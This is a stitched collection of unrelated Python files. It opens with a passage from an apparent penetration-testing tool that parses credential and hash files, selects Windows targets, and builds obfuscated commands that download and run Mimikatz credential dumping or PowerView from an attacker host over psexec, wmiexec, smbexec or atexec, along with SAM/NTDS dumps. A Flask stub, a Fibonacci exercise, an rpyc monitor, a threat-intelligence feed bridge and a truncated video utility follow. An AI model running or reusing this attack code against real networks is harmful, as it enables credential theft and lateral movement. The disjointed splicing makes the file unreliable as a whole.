src_port = args.src_port # Port to source the Mimikatz script on
#delivery = args.delivery # Uncomment when delivery option for SMB works
delivery = "web"
share_name = args.share_name
log = args.log
if ".log" not in log:
log = log + ".log"
level = logging.DEBUG # Logging level
format = logging.Formatter("%(asctime)s [%(levelname)-5.5s] %(message)s") # Log format
logger_obj = logging.getLogger() # Getter for logging agent
file_handler = logging.FileHandler(args.log) # File Handler
#stderr_handler = logging.StreamHandler() # STDERR Handler
timeout_value = int(args.timeout_value)
sleep_value = int(args.sleep_value)
src_ip = args.src_ip # IP to source the Mimikatz script on
payload = args.payload # The name of the payload that will be used
interface = args.interface # The interface to grab the IP from
mim_func = args.mim_func # The function that is executed
mim_arg = args.mim_arg # The argument processed by the function
invoker = args.invoker # Holds the results for invoker execution
executor = args.executor # Holds the results for the executor attack
downloader = args.downloader # Holds the results for exploit/multi/script/web_delivery
smbexec_cmd = args.smbexec_cmd # Holds the results for smbexec execution
wmiexec_cmd = args.wmiexec_cmd # Holds the results for the wmiexec execution
psexec_cmd = args.psexec_cmd # Holds the results for the psexec execution
atexec_cmd = args.atexec_cmd
get_domain = args.get_domain
get_forest = args.get_forest
get_forest_domains = args.get_forest_domains
find_local_admin_access = args.find_local_admin_access
get_dc = args.get_dc
netview_cmd = args.netview_cmd
target_dom = args.target_dom
aes = args.aes_key
share = args.share
protocol = args.protocol
directory = args.directory
usr = args.usr
pwd = args.pwd
dom = args.dom
target = args.target
target_filename = args.target_filename
exceptor = args.exceptor
exception_filename = args.exception_filename
command = args.command
#filename = args.filename
sam_dump = args.sam_dump
mode = args.mode.upper()
system = args.system
security = args.security
sam = args.sam
ntds = args.ntds
domain_group = args.domain_group
local_group = args.local_group
encoder = args.encoder
xml_targets = args.xml_targets
xml_exceptions = args.xml_exceptions
scan_tcp = args.scan_tcp
scan_syn = args.scan_syn
creds_file = args.creds_file
targets_list = []
exceptions_list = []
tgt_list = []
exc_list = []
LM = ""
NTLM = ""
no_output = False
execution = ""
supplement = ""
unprotected_command = ""
hash = None
methods = False
kerberos = False
attacks = True
method_dict = {}
dst = ""
test = ""
srv = None
verify_port = ''
verify_service = ''
entry = []
processed_xml_targets_dict = {}
processed_xml_exceptions_dict = {}
creds_list = []
creds_dict = {}
temp_key = None
SID_temp = None
LM_temp = ""
hash_temp = None
usr_temp = None
pwd_temp = None
NTLM_temp = ""
# Configure logger formats for STDERR and output file
file_handler.setFormatter(format)
#stderr_handler.setFormatter(format)
# Configure logger object
logger_obj.addHandler(file_handler)
#logger_obj.addHandler(stderr_handler)
logger_obj.setLevel(level)
# Get details for catapult server
if payload != None:
cwd = str(os.path.dirname(payload))
if "/" not in cwd:
cwd = str(os.getcwd())
payload = os.path.basename(payload)
payload = ''.join(payload)
elif delivery == "web":
cwd = "/opt/ranger/web/"
elif delivery == "smb":
cwd = "/opt/ranger/smb/"
src_port = 445
if aes != None:
kerberos = True
#if filename:
# payload = filename
if smbexec_cmd or wmiexec_cmd or psexec_cmd or atexec_cmd:
methods = True
if scan_tcp:
scan_type = "tcp"
elif scan_syn:
scan_type = "syn"
else:
scan_type = None
if not (methods or sam_dump or netview_cmd) and (scan_type):
sys.exit("[!] If you are going to execute a verification scan you have to choose a method to use for exploiting a target")
if creds_file:
with open(creds_file) as f:
creds_list = f.readlines()
for cred in creds_list:
if cred and ":" in cred and cred.count(':') == 6:
if cred.count(' ') == 1:
cred = cred.rstrip()
hash_temp, dom_temp = cred.split(' ')
if "WORKGROUP" not in dom:
dom_temp = dom
SID_temp, LM_temp, NTLM_temp, hash_temp, usr_temp, pwd_temp = pwd_test(hash_temp, verbose)
temp_key = "%s\%s" % (dom_temp, usr_temp)
print(temp_key) #DEBUG
if not usr_temp:
sys.exit("[!] Hash %s does not have a username") % (hash_temp)
if temp_key in creds_dict:
temp_list = creds_dict[temp_key]
temp_list[0] = SID_temp
temp_list[1] = LM_temp
temp_list[2] = NTLM_temp
temp_list[3] = hash_temp
else:
creds_dict[temp_key] = [SID_temp, LM_temp, NTLM_temp, hash_temp, usr_temp, pwd_temp, dom_temp]
elif cred.count(' ') == 0:
hash_temp = cred.rstrip()
dom_temp = dom
SID_temp, LM_temp, NTLM_temp, hash_temp, usr_temp, pwd_temp = pwd_test(hash_temp, verbose)
temp_key = "%s\%s" % (dom_temp, usr_temp)
if not usr_temp:
sys.exit("[!] Hash %s does not have a username") % (hash_temp)
if temp_key in creds_dict:
temp_list = creds_dict[temp_key]
temp_list[0] = SID_temp
temp_list[1] = LM_temp
temp_list[2] = NTLM_temp
temp_list[3] = hash_temp
else:
creds_dict[temp_key] = [SID_temp, LM_temp, NTLM_temp, hash_temp, usr_temp, pwd_temp, dom_temp]
elif cred and ":" in cred and cred.count(':') == 1:
if cred.count(' ') == 1:
cred = cred.rstrip()
usr_temp, hash_temp = cred.split(' ')
dom_temp = dom
                    SID_temp, LM_temp, NTLM_temp, hash_temp, usr_temp, pwd_temp = pwd_test(hash_temp, verbose, usr_temp)
temp_key = "%s\%s" % (dom_temp, usr_temp)
if not usr_temp:
sys.exit("[!] Hash %s does not have a username") % (hash_temp)
if temp_key in creds_dict:
temp_list = creds_dict[temp_key]
temp_list[0] = SID_temp
temp_list[1] = LM_temp
temp_list[2] = NTLM_temp
temp_list[3] = hash_temp
else:
creds_dict[temp_key] = [SID_temp, LM_temp, NTLM_temp, hash_temp, usr_temp, pwd_temp, dom_temp]
elif cred.count(' ') == 2:
cred = cred.rstrip()
                    usr_temp, pwd_temp, dom_temp = cred.split(' ')
temp_key = "%s\%s" % (dom_temp, usr_temp)
elif cred.count(' ') == 1:
cred = cred.rstrip()
dom_temp = dom
if "WORKGROUP" not in dom:
dom_temp = dom
usr_temp, pwd_temp = cred.split(' ')
temp_key = "%s\%s" % (dom_temp, usr_temp)
if not usr_temp:
sys.exit("[!] Hash %s does not have a username") % (hash_temp)
if temp_key in creds_dict:
temp_list = creds_dict[temp_key]
temp_list[4] = usr_temp
temp_list[5] = pwd_temp
else:
creds_dict[temp_key] = [SID_temp, LM_temp, NTLM_temp, hash_temp, usr_temp, pwd_temp, dom_temp]
elif cred.count(' ') == 2:
cred = cred.rstrip()
usr_temp, pwd_temp, dom_temp = cred.split(' ')
if "WORKGROUP" not in dom:
dom_temp = dom
temp_key = "%s\%s" % (dom_temp, usr_temp)
creds_dict[temp_key] = [SID_temp, LM_temp, NTLM_temp, hash_temp, usr_temp, pwd_temp, dom_temp]
else:
sys.exit("[!] An error occured trying to parse the credential file")
if smbexec_cmd:
verify_port, verify_service = protocol.split('/')
if atexec_cmd:
verify_port, verify_service = protocol.split('/')
if psexec_cmd:
verify_port, verify_service = protocol.split('/')
if wmiexec_cmd:
verify_port = "135"
if sam_dump:
verify_port = "445"
if netview_cmd:
verify_port = "445"
if invoker == None and methods == False:
print("[!] This script requires either a command, an invoker attack, or a downloader attack")
parser.print_help()
sys.exit(1)
if pwd and ":" in pwd and not creds_dict:
SID, LM, NTLM, hash, usr, pwd = pwd_test(pwd, verbose, usr)
creds_dict_status = is_empty(creds_dict)
if smbexec_cmd or wmiexec_cmd or atexec_cmd or psexec_cmd or sam_dump:
method_dict = {"smbexec" : smbexec_cmd, "wmiexec" : wmiexec_cmd, "atexec" : atexec_cmd, "psexec" : psexec_cmd}
if not creds_dict and usr == None and pwd == None:
sys.exit("[!] If you are trying to exploit a system you need a username and password")
if target == None and target_filename == None and xml_targets == None:
sys.exit("[!] If you are trying to exploit a system you need at least one target")
gateways = get_gateways()
network_ifaces = get_networks(gateways)
if src_ip == None:
try:
src_ip = network_ifaces[interface]['addr']
except Exception, e:
print("[!] No IP address found on interface %s") % (interface)
if target_filename:
with open(target_filename) as f:
targets_list = [line.rstrip() for line in f]
if xml_targets:
processed_xml_targets_dict = xml_list_process(xml_targets, verbose)
if xml_exceptions:
processed_xml_exceptions_dict = xml_list_process(xml_exceptions, verbose)
for key, entry in processed_xml_targets_dict.iteritems():
if "tcp" in entry[2] and verify_port in entry[3] and "open" in entry[6]:
if verbose > 1:
print("[+] Adding %s to target list") % (entry[1])
targets_list.append(entry[1])
if verbose > 2:
print("[*] Hostname: %s IP: %s Protocol: %s Port: %s Service: %s State: %s MAC address: %s" % (entry[0], entry[1], entry[2], entry[3], entry[4], entry[6], entry[5]))
# Process targets
if target and "," in target:
targets_list.extend(target.split(','))
elif target:
targets_list.append(target)
if targets_list:
for item in targets_list:
try:
tgt = TargetConverter(item)
except Exception, e:
print("[!] The following error occurred %s") % (e)
sys.exit(1)
try:
tgt_list.extend(tgt.return_targets())
except Exception, e:
print("[!] The following error occurred %s") % (e)
sys.exit(1)
else:
tgt_list.extend(targets_list)
# Process exceptions
if exception_filename:
with open(exception_filename) as f:
exceptions_list = [line.rstrip() for line in f]
for key, entry in processed_xml_exceptions_dict.iteritems():
if "tcp" in entry[2] and verify_port in entry[3] and "open" in entry[6]:
if verbose > 1:
print("[+] Adding %s to exceptions list") % (entry[1])
            exceptions_list.append(entry[1])
if verbose > 2:
print("[*] Hostname: %s IP: %s Protocol: %s Port: %s Service: %s State: %s MAC address: %s" % (entry[0], entry[1], entry[2], entry[3], entry[4], entry[6], entry[5]))
if exceptor and "," in exceptor:
        exceptions_list.extend(exceptor.split(','))
elif exceptor:
exceptions_list.append(exceptor)
if exceptions_list:
for item in exceptions_list:
try:
exc = TargetConverter(item)
except Exception, e:
print("[!] The following error occurred %s") % (e)
sys.exit(1)
try:
exc_list.extend(exc.return_targets())
except Exception, e:
print("[!] The following error occurred %s") % (e)
sys.exit(1)
else:
exc_list.extend(exceptions_list)
exc_list.append(src_ip)
tgt_list = list(set(tgt_list))
exc_list = list(set(exc_list))
final_targets = [ip for ip in tgt_list if ip not in exc_list]
final_targets.sort()
if invoker:
execution = "invoker"
if mim_func == None:
mim_func = "Invoke-Mimikatz"
if mim_arg == None:
mim_arg = "-DumpCreds"
if payload == None:
payload = "im.ps1"
x = Obfiscator(src_ip, src_port, payload, mim_func, mim_arg, execution, method_dict, domain_group, delivery, share_name, dom, local_group)
command, unprotected_command = x.return_command()
attacks = True
elif executor:
if not payload or not mim_func:
sys.exit("[!] You must provide at least the name tool to be injected into memory and the cmdlet name to be executed")
execution = "executor"
x = Obfiscator(src_ip, src_port, payload, mim_func, mim_arg, execution, method_dict, domain_group, delivery, share_name, dom, local_group)
command, unprotected_command = x.return_command()
attacks = True
elif downloader:
if delivery == "smb":
sys.exit("[!] The Metasploit web_delivery module only works through web server based attacks")
execution = "downloader"
x = Obfiscator(src_ip, src_port, payload, mim_func, mim_arg, execution, method_dict, domain_group, delivery, share_name, dom, local_group)
command, unprotected_command = x.return_command()
elif domain_group:
execution = "domain_group"
domain_group = "'" + domain_group + "'"
if mim_func == None:
mim_func = "Get-NetGroup"
if mim_arg == None:
if not target_dom:
mim_arg = "-GroupName %s -Domain %s" % (domain_group, dom)
else:
mim_arg = "-GroupName %s -Domain %s" % (domain_group, target_dom)
if payload == None:
payload = "pv.ps1"
x = Obfiscator(src_ip, src_port, payload, mim_func, mim_arg, execution, method_dict, domain_group, delivery, share_name, dom, local_group)
command, unprotected_command = x.return_command()
attacks = True
elif local_group:
execution = "local_group"
local_group = "'" + local_group + "'"
if mim_func == None:
mim_func = "Get-NetLocalGroup"
if mim_arg == None:
mim_arg = "-GroupName %s" % (local_group)
if payload == None:
payload = "pv.ps1"
x = Obfiscator(src_ip, src_port, payload, mim_func, mim_arg, execution, method_dict, domain_group, delivery, share_name, dom, local_group)
command, unprotected_command = x.return_command()
attacks = True
elif get_domain:
execution = "executor"
if mim_func == None:
mim_func = "Get-NetDomain"
if payload == None:
payload = "pv.ps1"
x = Obfiscator(src_ip, src_port, payload, mim_func, mim_arg, execution, method_dict, domain_group, delivery, share_name, dom, local_group)
command, unprotected_command = x.return_command()
attacks = True
elif get_forest:
execution = "executor"
if mim_func == None:
mim_func = "Get-NetForest"
if payload == None:
payload = "pv.ps1"
x = Obfiscator(src_ip, src_port, payload, mim_func, mim_arg, execution, method_dict, domain_group, delivery, share_name, dom, local_group)
command, unprotected_command = x.return_command()
attacks = True
elif get_forest_domains:
execution = "executor"
if mim_func == None:
mim_func = "Get-NetForestDomains"
if payload == None:
payload = "pv.ps1"
x = Obfiscator(src_ip, src_port, payload, mim_func, mim_arg, execution, method_dict, domain_group, delivery, share_name, dom, local_group)
command, unprotected_command = x.return_command()
attacks = True
elif get_dc:
execution = "executor"
if mim_func == None:
mim_func = "Get-NetDomainControllers"
if payload == None:
payload = "pv.ps1"
x = Obfiscator(src_ip, src_port, payload, mim_func, mim_arg, execution, method_dict, domain_group, delivery, share_name, dom, local_group)
command, unprotected_command = x.return_command()
attacks = True
elif find_local_admin_access:
execution = "executor"
if mim_func == None:
mim_func = "Invoke-FindLocalAdminAccess"
if payload == None:
payload = "pv.ps1"
if mim_arg == None:
if not target_dom:
if sleep_value > 0:
mim_arg = "-Domain %s -Delay %s" % (dom, sleep_value)
else:
mim_arg = "-Domain %s" % (dom)
else:
if sleep_value > 0:
mim_arg = "-Domain %s -Delay %s" % (target_dom, sleep_value)
else:
mim_arg = "-Domain %s" % (target_dom)
x = Obfiscator(src_ip, src_port, payload, mim_func, mim_arg, execution, method_dict, domain_group, delivery, share_name, dom, local_group)
command, unprotected_command = x.return_command()
attacks = True
elif netview_cmd:
attacks = True
elif sam_dump:
attacks = True
elif command:
attacks = False
else:
attacks = False
if not attacks and not methods:
sys.exit("[!] You need to provide ranger with details necessary to execute relevant attacks and methods")
instructions = instructions_func(payload, src_port, command, unprotected_command, smbexec_cmd, execution, delivery)
if methods and sam_dump:
sys.exit("[!] You do not execute the --secrets-dump with a method, it should be executed on its own.")
if not final_targets and not execution:
sys.exit("[!] No targets to exploit or commands to provide")
if creds_dict:
for key, value in creds_dict.iteritems():
SID = value[0]
LM = value[1]
NTLM = value[2]
hash = value[3]
usr = value[4]
pwd = value[5]
dom = value[6]
method_func(psexec_cmd, wmiexec_cmd, netview_cmd, smbexec_cmd, atexec_cmd, sam_dump, dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, kerberos, aes, mode, share, instructions, directory, scan_type, verbose, verify_port, final_targets, system, security, sam, ntds, no_output, encoder, timeout_value, sleep_value)
else:
method_func(psexec_cmd, wmiexec_cmd, netview_cmd, smbexec_cmd, atexec_cmd, sam_dump, dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, kerberos, aes, mode, share, instructions, directory, scan_type, verbose, verify_port, final_targets, system, security, sam, ntds, no_output, encoder, timeout_value, sleep_value)
if __name__ == '__main__':
main()
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Hello. I am alive!"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
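# Hedged usage note: keep_alive() is typically imported by a long-running script
# so the Flask thread keeps the hosting process reachable; run_bot() below is a
# placeholder for the caller's own main loop.
#
#     from keep_alive import keep_alive
#     keep_alive()
#     run_bot()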
|
exo2.py
|
#!/usr/bin/env python3
"""
An exemple of shared memory between processes
"""
from multiprocessing import Process, Manager
from sys import argv
def producer(number, fib_list):
"""
Returns the #num fibonacci number using recursion
:param number: current number
:param fib_list: pointer to shared list of fibonacci numbers
"""
# If the number has already been computed
if fib_list[number] != -1:
return fib_list[number]
if number <= 1:
fib_list[number] = number
else:
fib_list[number] = producer(number - 1, fib_list) + producer(number - 2, fib_list)
return fib_list[number]
def consumer():
    # stub left unimplemented; pass keeps the module syntactically valid
    pass
if __name__ == "__main__":
if len(argv) == 2 and argv[1].isdigit() and int(argv[1]) >= 0:
with Manager() as manager:
num = int(argv[1])
fibs = manager.list([-1]*(num+1))
p = Process(target=producer, args=(num, fibs))
p.start()
p.join()
print(fibs)
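# Expected behaviour (sketch): running `./exo2.py 10` fills the shared list with
# the first eleven Fibonacci numbers, e.g. [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55].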
|
server.py
|
import rpyc
import os
import time
from threading import Thread
class FileMonitorService(rpyc.Service):
class exposed_FileMonitor(object):
def __init__(self, filename, callback, interval = 1):
self.filename = filename
self.interval = interval
self.last_stat = None
self.callback = rpyc.async(callback) # make the callback async
self.active = True
self.thread = Thread(target = self.work)
self.thread.start()
def exposed_stop(self):
self.active = False
self.thread.join()
def work(self):
while self.active:
stat = os.stat(self.filename)
if self.last_stat is not None and self.last_stat != stat:
self.callback(self.last_stat, stat)
self.last_stat = stat
time.sleep(self.interval)
if __name__ == "__main__":
from rpyc.utils.server import ThreadedServer
ThreadedServer(FileMonitorService, port = 18871).start()
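# Hedged client-side sketch (standard rpyc client API; the path and callback are
# placeholders): connect, start a background serving thread so the asynchronous
# callback can be delivered, then request a FileMonitor from the service.
#
#     import rpyc
#     conn = rpyc.connect("localhost", 18871)
#     bgsrv = rpyc.BgServingThread(conn)
#     def on_change(old_stat, new_stat):
#         print("file changed:", old_stat, "->", new_stat)
#     mon = conn.root.FileMonitor("/tmp/watched.txt", on_change, interval=1)
#     # ... later ...
#     mon.stop()
#     bgsrv.stop()
#     conn.close()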
|
bridge.py
|
#
# Copyright 2013 CarbonBlack, Inc
#
import os
import sys
import time
from time import gmtime, strftime
import logging
from logging.handlers import RotatingFileHandler
import threading
import version
import cbint.utils.json
import cbint.utils.feed
import cbint.utils.flaskfeed
import cbint.utils.cbserver
import cbint.utils.filesystem
from cbint.utils.daemon import CbIntegrationDaemon
from Threatconnect import ThreatConnectFeedGenerator, ConnectionException
import traceback
from cbapi.response import CbResponseAPI, Feed
from cbapi.example_helpers import get_object_by_name_or_id
from cbapi.errors import ServerError
logger = logging.getLogger(__name__)
class CarbonBlackThreatConnectBridge(CbIntegrationDaemon):
def __init__(self, name, configfile, logfile=None, pidfile=None, debug=False):
CbIntegrationDaemon.__init__(self, name, configfile=configfile, logfile=logfile, pidfile=pidfile, debug=debug)
template_folder = "/usr/share/cb/integrations/cb-threatconnect-connector/content"
self.flask_feed = cbint.utils.flaskfeed.FlaskFeed(__name__, False, template_folder)
self.bridge_options = {}
self.bridge_auth = {}
self.api_urns = {}
self.validated_config = False
self.cb = None
self.sync_needed = False
self.feed_name = "threatconnectintegration"
self.display_name = "ThreatConnect"
self.feed = {}
self.directory = template_folder
self.cb_image_path = "/carbonblack.png"
self.integration_image_path = "/threatconnect.png"
self.integration_image_small_path = "/threatconnect-small.png"
self.json_feed_path = "/threatconnect/json"
self.feed_lock = threading.RLock()
self.logfile = logfile
self.flask_feed.app.add_url_rule(self.cb_image_path, view_func=self.handle_cb_image_request)
self.flask_feed.app.add_url_rule(self.integration_image_path, view_func=self.handle_integration_image_request)
self.flask_feed.app.add_url_rule(self.json_feed_path, view_func=self.handle_json_feed_request, methods=['GET'])
self.flask_feed.app.add_url_rule("/", view_func=self.handle_index_request, methods=['GET'])
self.flask_feed.app.add_url_rule("/feed.html", view_func=self.handle_html_feed_request, methods=['GET'])
self.initialize_logging()
logger.debug("generating feed metadata")
with self.feed_lock:
self.feed = cbint.utils.feed.generate_feed(
self.feed_name,
summary="Threat intelligence data provided by ThreatConnect to the Carbon Black Community",
tech_data="There are no requirements to share any data to receive this feed.",
provider_url="http://www.threatconnect.com/",
icon_path="%s/%s" % (self.directory, self.integration_image_path),
small_icon_path="%s/%s" % (self.directory, self.integration_image_small_path),
display_name=self.display_name,
category="Partner")
self.last_sync = "No sync performed"
self.last_successful_sync = "No sync performed"
def initialize_logging(self):
if not self.logfile:
log_path = "/var/log/cb/integrations/%s/" % self.name
cbint.utils.filesystem.ensure_directory_exists(log_path)
self.logfile = "%s%s.log" % (log_path, self.name)
root_logger = logging.getLogger()
root_logger.setLevel(logging.INFO)
root_logger.handlers = []
rlh = RotatingFileHandler(self.logfile, maxBytes=524288, backupCount=10)
rlh.setFormatter(logging.Formatter(fmt="%(asctime)s: %(module)s: %(levelname)s: %(message)s"))
root_logger.addHandler(rlh)
@property
def integration_name(self):
return 'Cb ThreatConnect Connector 1.2.9'
def serve(self):
if "https_proxy" in self.bridge_options:
os.environ['HTTPS_PROXY'] = self.bridge_options.get("https_proxy", "")
os.environ['no_proxy'] = '127.0.0.1,localhost'
address = self.bridge_options.get('listener_address', '127.0.0.1')
port = self.bridge_options['listener_port']
logger.info("starting flask server: %s:%s" % (address, port))
self.flask_feed.app.run(port=port, debug=self.debug,
host=address, use_reloader=False)
def handle_json_feed_request(self):
with self.feed_lock:
json = self.flask_feed.generate_json_feed(self.feed)
return json
def handle_html_feed_request(self):
with self.feed_lock:
html = self.flask_feed.generate_html_feed(self.feed, self.display_name)
return html
def handle_index_request(self):
with self.feed_lock:
index = self.flask_feed.generate_html_index(self.feed, self.bridge_options, self.display_name,
self.cb_image_path, self.integration_image_path,
self.json_feed_path, self.last_sync)
return index
def handle_cb_image_request(self):
return self.flask_feed.generate_image_response(image_path="%s%s" % (self.directory, self.cb_image_path))
def handle_integration_image_request(self):
return self.flask_feed.generate_image_response(image_path="%s%s" %
(self.directory, self.integration_image_path))
def run(self):
logger.info("starting Carbon Black <-> ThreatConnect Connector | version %s" % version.__version__)
logger.debug("starting continuous feed retrieval thread")
work_thread = threading.Thread(target=self.perform_continuous_feed_retrieval)
work_thread.setDaemon(True)
work_thread.start()
logger.debug("starting flask")
self.serve()
def validate_config(self):
self.validated_config = True
logger.info("Validating configuration file ...")
if 'bridge' in self.options:
self.bridge_options = self.options['bridge']
else:
logger.error("Configuration does not contain a [bridge] section")
return False
if 'auth' in self.options:
self.bridge_auth = self.options['auth']
else:
logger.error("configuration does not contain a [auth] section")
return False
if 'sources' in self.options:
self.api_urns = self.options["sources"]
else:
logger.error("configuration does not contain a [sources] section")
return False
opts = self.bridge_options
auth = self.bridge_auth
config_valid = True
msgs = []
if len(self.api_urns) <= 0:
msgs.append('No data sources are configured under [sources]')
config_valid = False
item = 'listener_port'
if not (item in opts and opts[item].isdigit() and 0 < int(opts[item]) <= 65535):
msgs.append('the config option listener_port is required and must be a valid port number')
config_valid = False
else:
opts[item] = int(opts[item])
item = 'listener_address'
        if not (item in opts and opts[item] != ""):
msgs.append('the config option listener_address is required and cannot be empty')
config_valid = False
item = 'feed_retrieval_minutes'
if not (item in opts and opts[item].isdigit() and 0 < int(opts[item])):
            msgs.append('the config option feed_retrieval_minutes is required and must be a positive number')
config_valid = False
else:
opts[item] = int(opts[item])
item = 'ioc_min_score'
if item in opts:
if not (opts[item].isdigit() and 0 <= int(opts[item]) <= 100):
msgs.append('The config option ioc_min_score must be a number in the range 0 - 100')
config_valid = False
else:
opts[item] = int(opts[item])
else:
logger.warning("No value provided for ioc_min_score. Using 1")
opts[item] = 1
item = 'api_key'
if not (item in auth and auth[item].isdigit()):
msgs.append('The config option api_key is required under section [auth] and must be a numeric value')
config_valid = False
item = 'url'
        if not (item in auth and auth[item] != ""):
msgs.append('The config option url is required under section [auth] and cannot be blank')
config_valid = False
if 'secret_key_encrypted' in auth and 'secret_key' not in auth:
msgs.append("Encrypted API secret key no longer supported. Use unencrypted 'secret_key' form.")
config_valid = False
elif 'secret_key' in auth and auth['secret_key'] != "":
auth['api_secret_key'] = self.bridge_auth.get("secret_key")
else:
msgs.append('The config option secret_key under section [auth] must be provided')
config_valid = False
# Convert all 1 or 0 values to true/false
opts["ignore_ioc_md5"] = opts.get("disable_ioc_md5", "0") == "1"
opts["ignore_ioc_ip"] = opts.get("disable_ioc_ip", "0") == "1"
opts["ignore_ioc_host"] = opts.get("disable_ioc_host", "0") == "1"
# create a cbapi instance
ssl_verify = self.get_config_boolean("carbonblack_server_sslverify", False)
server_url = self.get_config_string("carbonblack_server_url", "https://127.0.0.1")
server_token = self.get_config_string("carbonblack_server_token", "")
try:
self.cb = CbResponseAPI(url=server_url,
token=server_token,
                                    ssl_verify=ssl_verify,
integration_name=self.integration_name)
self.cb.info()
except:
logger.error(traceback.format_exc())
return False
if not config_valid:
for msg in msgs:
sys.stderr.write("%s\n" % msg)
logger.error(msg)
return False
else:
return True
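    # Hedged sketch of a configuration file the checks above accept; section and
    # option names come from validate_config(), the values are placeholders, and
    # where the carbonblack_server_* options live depends on get_config_string()
    # in CbIntegrationDaemon.
    #
    #   [bridge]
    #   listener_address=0.0.0.0
    #   listener_port=6100
    #   feed_retrieval_minutes=60
    #   ioc_min_score=1
    #   carbonblack_server_url=https://127.0.0.1
    #   carbonblack_server_token=<api token>
    #
    #   [auth]
    #   url=https://api.threatconnect.com
    #   api_key=123456
    #   secret_key=<secret key>
    #
    #   [sources]
    #   Example Source=<source identifier>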
def _filter_results(self, results):
logger.debug("Number of IOCs before filtering applied: %d", len(results))
opts = self.bridge_options
filter_min_score = opts["ioc_min_score"]
# Filter out those scores lower than the minimum score
if filter_min_score > 0:
results = filter(lambda x: x["score"] >= filter_min_score, results)
logger.debug("Number of IOCs after scores less than %d discarded: %d", filter_min_score,
len(results))
# For end user simplicity we call "dns" entries "host" and ipv4 entries "ip"
# format: {"flag_name" : ("official_name", "friendly_name")}
ignore_ioc_mapping = {"ignore_ioc_md5": ("md5", "md5"),
"ignore_ioc_ip": ("ipv4", "ip"),
"ignore_ioc_host": ("dns", "host")}
# On a per flag basis discard md5s, ips, or host if the user has requested we do so
# If we don't discard then check if an exclusions file has been specified and discard entries
# that match those in the exclusions file
for ignore_flag in ignore_ioc_mapping:
exclude_type = ignore_ioc_mapping[ignore_flag][0]
exclude_type_friendly_name = ignore_ioc_mapping[ignore_flag][1]
if opts[ignore_flag]:
results = filter(lambda x: exclude_type not in x["iocs"], results)
logger.debug("Number of IOCs after %s entries discarded: %d", exclude_type, len(results))
elif 'exclusions' in self.options and exclude_type_friendly_name in self.options['exclusions']:
file_path = self.options['exclusions'][exclude_type_friendly_name]
if not os.path.exists(file_path):
logger.debug("Exclusions file %s not found", file_path)
continue
with open(file_path, 'r') as exclude_file:
data = frozenset([line.strip() for line in exclude_file])
results = filter(lambda x: exclude_type not in x["iocs"] or x["iocs"][exclude_type][0] not in data,
results)
logger.debug("Number of IOCs after %s exclusions file applied: %d",
exclude_type_friendly_name, len(results))
return results
def perform_continuous_feed_retrieval(self, loop_forever=True):
try:
# config validation is critical to this connector working correctly
if not self.validated_config:
self.validate_config()
opts = self.bridge_options
auth = self.bridge_auth
while True:
logger.debug("Starting retrieval iteration")
try:
tc = ThreatConnectFeedGenerator(auth["api_key"], auth['api_secret_key'],
auth["url"], self.api_urns.items())
tmp = tc.get_threatconnect_iocs()
tmp = self._filter_results(tmp)
with self.feed_lock:
self.feed["reports"] = tmp
self.last_sync = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime())
self.last_successful_sync = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime())
logger.info("Successfully retrieved data at %s" % self.last_successful_sync)
except ConnectionException as e:
logger.error("Error connecting to Threat Connect: %s" % e.value)
self.last_sync = self.last_successful_sync + " (" + str(e.value) + ")"
if not loop_forever:
sys.stderr.write("Error connecting to Threat Connect: %s\n" % e.value)
sys.exit(2)
except Exception as e:
logger.error(traceback.format_exc())
time.sleep(opts.get('feed_retrieval_minutes') * 60)
# synchronize feed with Carbon Black server
if not "skip_cb_sync" in opts:
try:
feeds = get_object_by_name_or_id(self.cb, Feed, name=self.feed_name)
except Exception as e:
                        logger.error(str(e))
feeds = None
if not feeds:
logger.info("Feed {} was not found, so we are going to create it".format(self.feed_name))
f = self.cb.create(Feed)
f.feed_url = "http://{0}:{1}/threatconnect/json".format(
self.bridge_options.get('feed_host', '127.0.0.1'),
self.bridge_options.get('listener_port', '6100'))
f.enabled = True
f.use_proxy = False
f.validate_server_cert = False
try:
f.save()
except ServerError as se:
if se.error_code == 500:
logger.info("Could not add feed:")
logger.info(
" Received error code 500 from server. This is usually because the server cannot retrieve the feed.")
logger.info(
" Check to ensure the Cb server has network connectivity and the credentials are correct.")
else:
logger.info("Could not add feed: {0:s}".format(str(se)))
except Exception as e:
logger.info("Could not add feed: {0:s}".format(str(e)))
else:
logger.info("Feed data: {0:s}".format(str(f)))
logger.info("Added feed. New feed ID is {0:d}".format(f.id))
f.synchronize(False)
                    elif len(feeds) > 1:
                        logger.warning("Multiple feeds found, selecting Feed id {}".format(feeds[0].id))
                        feeds[0].synchronize(False)
elif feeds:
feed_id = feeds[0].id
logger.info("Feed {} was found as Feed ID {}".format(self.feed_name, feed_id))
feeds[0].synchronize(False)
logger.debug("ending feed retrieval loop")
# Function should only ever return when loop_forever is set to false
if not loop_forever:
return self.flask_feed.generate_json_feed(self.feed).data
time.sleep(opts.get('feed_retrieval_minutes') * 60)
except Exception:
# If an exception makes us exit then log what we can for our own sake
logger.fatal("FEED RETRIEVAL LOOP IS EXITING! Daemon should be restarted to restore functionality! ")
logger.fatal("Fatal Error Encountered:\n %s" % traceback.format_exc())
sys.stderr.write("FEED RETRIEVAL LOOP IS EXITING! Daemon should be restarted to restore functionality!\n")
sys.stderr.write("Fatal Error Encountered:\n %s\n" % traceback.format_exc())
sys.exit(3)
# If we somehow get here the function is going to exit.
# This is not normal so we LOUDLY log the fact
logger.fatal("FEED RETRIEVAL LOOP IS EXITING! Daemon should be restarted to restore functionality!")
|
app_utils.py
|
# App Utils
import struct
import six
import collections
import cv2
import datetime
from threading import Thread
from matplotlib import colors
class FPS:
def __init__(self):
        # Store the start time, the end time, and the total number of frames examined between the start and end intervals
self._start = None
self._end = None
self._numFrames = 0
def start(self):
        # Start the timer
self._start = datetime.datetime.now()
return self
def stop(self):
        # Stop the timer
self._end = datetime.datetime.now()
def update(self):
        # Increment the total number of frames examined between the start and end intervals
self._numFrames += 1
def elapsed(self):
        # Return the total number of seconds between the start and end intervals
return (self._end - self._start).total_seconds()
def fps(self):
        # Compute the (approximate) frames per second
return self._numFrames / self.elapsed()
class WebcamVideoStream:
